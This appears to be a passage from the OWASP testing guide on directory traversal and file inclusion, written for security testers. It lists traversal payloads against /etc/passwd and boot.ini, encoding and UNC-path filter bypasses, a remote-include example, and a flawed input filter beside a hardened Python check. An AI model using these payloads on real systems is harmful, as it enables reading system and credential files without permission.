OWASP Penetration Testing Guide: OWASP Testing Guide v5

OWASP Testing Guide document location:
https://github.com/OWASP/OWASP-Testing-Guide-v5

github.com/OWASP/../4.6.1_Testing_Directory_Traversal_File_Include_OTG-AUTHZ-001

Summary

(a) Input vector enumeration (a systematic evaluation of each input vector)

(b) Testing techniques (a systematic evaluation of each attack technique an attacker uses to exploit the vulnerability)

How to Test

Black Box Testing

Input Vectors Enumeration

http://example.com/getUserProfile.jsp?item=ikki.html
http://example.com/index.php?file=content
http://example.com/main.cgi?home=index.htm

Cookie: ID=d9ccd3f4f9f18cc1:TM=2166255468:LM=1162655568:S=3cFpqbJgMSSPKVMV:TEMPLATE=flower
Cookie: USER=1826cc8f:PSTYLE=GreenDotRed

Testing Techniques

http://example.com/getUserProfile.jsp?item=../../../../etc/passwd

Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd

http://example.com/index.php?file=http://www.owasp.org/malicioustxt

http://example.com/index.php?file=file:///etc/passwd

http://example.com/index.php?file=http://localhost:8080
or
http://example.com/index.php?file=http://192.168.0.2:9080

http://example.com/main.cgi?home=main.cgi

Unix-like OS:

• root directory: "/"
• directory separator: "/"

Windows OS (shell):

• root directory: "<drive letter>:\"
• directory separator: "\" or "/"

Classic Mac OS:

• root directory: "<drive letter>:"
• directory separator: ":"

• URL encoding and double URL encoding
  • %2e%2e%2f represents ../
  • %2e%2e/ represents ../
  • ..%2f represents ../
  • %2e%2e%5c represents ..\
  • %2e%2e\ represents ..\
  • ..%5c represents ..\
  • %252e%252e%255c represents ..\
  • ..%255c represents ..\ and so on.
• Unicode/UTF-8 encoding (only works on systems whose decoder accepts overlong UTF-8 sequences; a compliant decoder rejects them)
  • ..%c0%af represents ../
  • ..%c1%9c represents ..\

• Windows shell: Appending any of the following to paths used in a shell command results in no difference in function:
  • Angle brackets ">" and "<" at the end of the path
  • Double quotes (closed properly) at the end of the path
  • Extraneous current directory markers such as "./" or ".\"
  • Extraneous parent directory markers with arbitrary items that may or may not exist
  Examples (all refer to the same file):
  file.txt
  file.txt...
  file.txt<spaces>
  file.txt""""
  file.txt<<<>>><
  ./././file.txt
  nonexistant/../file.txt
• Windows API: The following items are discarded when used in any shell command or API call where a string is taken as a filename:
  • trailing periods
  • trailing spaces
• Windows UNC file paths: Used to reference files on SMB shares. Sometimes an application can be made to refer to a file on a remote UNC path. If so, the web server's SMB client may send stored credentials to the attacker's share, where they can be captured and cracked. UNC paths can also be built with a self-referential IP address or host name to evade filters, or used to reach SMB shares that are inaccessible to the attacker but accessible from the web server.
  \\server_or_ip\path\to\file.abc
  \\?\server_or_ip\path\to\file.abc
• Windows NT device namespace: Used to refer to the Windows device namespace. Certain references allow access to file systems through a different path.
  • \\.\GLOBALROOT\Device\HarddiskVolume1\ may be equivalent to a drive letter such as C:\, or even to a drive volume without an assigned letter.
  • \\.\CdRom0\ refers to the first disc drive on the machine.

Gray Box Testing

Functions to look for in source review:

PHP: include(), include_once(), require(), require_once(), fopen(), readfile(), ...
JSP/Servlet: java.io.File(), java.io.FileReader(), ...
ASP: include file, include virtual, ...

lang:php (include|require)(_once)?\s*['"(]?\s*\$_(GET|POST|COOKIE)

An input filter like the following, which rewrites "/" to "\" and then strips "..\" in a single non-repeating pass (as printed, the results of Replace are also never assigned back to filename), does not stop traversal:

    filename = Request.QueryString("file");
    Replace(filename, "/", "\");
    Replace(filename, "..\", "");

It is bypassed by payloads whose ".." survive one round of stripping:

    file=....//....//boot.ini
    file=....\....\boot.ini
    file= ..\..\boot.ini
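As an added example (not code from the guide), the strip-once filter above is modelled in Python next to a canonicalise-then-check replacement. The flawed version shows why "....//....//boot.ini" collapses to "..\..\boot.ini" after the filter has run; the hardened version decodes, normalises and only then tests that the result is still under the document root, so there is nothing to strip and nothing to bypass. TEMPLATE_ROOT and the function names are assumptions for this example.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical document root for this example (not from the guide).
TEMPLATE_ROOT = "/var/www/app/templates"


def naive_sanitize(filename):
    """Model of the filter above: every "/" becomes "\\", then every "..\\" is
    removed in one non-repeating pass. Deliberately flawed."""
    filename = filename.replace("/", "\\")
    return filename.replace("..\\", "")


def hardened_resolve(filename, root=TEMPLATE_ROOT):
    """Canonicalise first, then check containment, instead of stripping.

    Decodes twice so a double-encoded name is judged on what it decodes to,
    rejects empty names, NUL bytes, backslashes and ':' (drive letters and
    file:// or http:// schemes), and finally verifies that the normalised
    absolute path is still under root. Raises ValueError on anything else.
    On Windows you would additionally strip trailing dots/spaces and compare
    os.path.realpath() results, since the filesystem ignores those characters."""
    decoded = unquote(unquote(filename))
    if not decoded or any(c in decoded for c in ("\x00", "\\", ":")):
        raise ValueError("rejected filename: %r" % filename)
    candidate = posixpath.normpath(posixpath.join(root, decoded))
    if posixpath.commonpath([root, candidate]) != root:
        raise ValueError("path escapes template root: %r" % candidate)
    return candidate


def is_allowed(filename, root=TEMPLATE_ROOT):
    """True if hardened_resolve() accepts the name, False if it raises."""
    try:
        hardened_resolve(filename, root)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for p in ("..\\..\\boot.ini", "....//....//boot.ini", "../../../../etc/passwd",
              "%252e%252e%252fetc/passwd", "file:///etc/passwd", "content.html"):
        print("%-32s naive=%-20s hardened=%s" % (p, naive_sanitize(p), is_allowed(p)))
```

Note that the hardened resolver is not fooled by "....//" either: "...." is simply a directory name under the root, so the path is accepted as harmless and the file will not exist. Where the set of includable files is small, an allowlist of names is simpler still and removes path handling from the attack surface entirely.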

Tools used:

